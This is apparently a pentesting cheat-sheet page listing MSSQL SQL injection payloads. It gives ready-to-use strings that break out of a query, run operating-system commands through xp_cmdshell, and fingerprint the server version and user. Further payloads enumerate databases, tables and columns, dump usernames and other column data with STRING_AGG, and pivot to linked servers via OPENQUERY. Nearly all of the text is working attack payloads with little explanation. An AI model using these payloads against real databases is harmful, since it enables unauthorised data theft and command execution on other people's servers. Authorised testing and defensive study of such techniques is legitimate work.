MSSQL

Standard

-- XP_CMDSHELL
Query: 00') EXEC xp_cmdshell 'net user'-- -

UNION

-- RANDOM
--- Version
Query: 00') UNION SELECT NULL,NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL,NULL,NULL--

--- User
Query: 00') UNION SELECT NULL,NULL,NULL,user,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -

--- Databases (n = 0,1,2,3,4 etc..)
Query: 00') UNION SELECT NULL,NULL,NULL,DB_NAME(N),NULL,NULL,NULL,NULL,NULL,NULL,NULL -- -

------------------------

-- DATABASE INFORMATION
--- LIST TABLES
Query: 00') UNION SELECT NULL,NULL,NULL,table_name,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM information_schema.tables -- -
Query: 00') UNION SELECT NULL,NULL,NULL,table_name,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM information_schema.tables WHERE table_catalog = 'TEST_DB'-- -
Query: 00') UNION SELECT NULL,NULL,NULL,(SELECT STRING_AGG(table_name,'|') FROM (SELECT table_name FROM information_schema.tables WHERE table_type='BASE TABLE' ORDER BY table_name OFFSET 0 ROWS FETCH NEXT 50 ROWS ONLY) AS t),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
Query: 00') UNION SELECT NULL,NULL,NULL,table_name,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM information_schema.tables WHERE table_catalog = 'TEST_DB' OFFSET 0 ROWS FETCH NEXT 1 ROWS ONLY-- -

-- LIST COLUMNS
Query: 00') UNION SELECT NULL,NULL,NULL,(SELECT STRING_AGG(column_name,'|') FROM (SELECT column_name FROM information_schema.columns WHERE table_name='POC_Test' ORDER BY table_name OFFSET 0 ROWS FETCH NEXT 50 ROWS ONLY) AS t),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -

-- DUMP CONTENT FROM COLUMN
--- SINGEL COLUMN
Query: 00') UNION SELECT NULL,NULL,NULL,(SELECT STRING_AGG(UserName,'|') FROM (SELECT UserName FROM POC_Test ORDER BY UserName OFFSET 0 ROWS FETCH NEXT 50 ROWS ONLY) AS t),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -

--- MULTIPLE COLUMNs
Query: 00') UNION SELECT NULL,NULL,NULL,(SELECT STRING_AGG(CONCAT_WS(',',NameID,UserName),'|') FROM (SELECT NameID,UserName FROM POC_Test ORDER BY NameID OFFSET 0 ROWS FETCH NEXT 50 ROWS ONLY) AS t),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -

------------------------

-- LINKED DATABASES
--- LIST COLUMNS
Query: 00') UNION SELECT NULL,NULL,NULL,(SELECT CAST(v AS NVARCHAR(MAX)) FROM OPENQUERY(<HOSTNAME>,'SELECT column_name FROM information_schema.columns WHERE table_name=''TEST_TABLE'' AS v')),NULL
Query: 00') UNION SELECT NULL,NULL,NULL,(SELECT STRING_AGG(column_name,'|') FROM OPENQUERY(<HOSTNAME>,'SELECT column_name FROM information_schema.columns WHERE table_name=''test_table'' ORDER BY table_name OFFSET 0 ROWS FETCH NEXT 50 ROWS ONLY')),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -

Last updated 6 days ago

Was this helpful?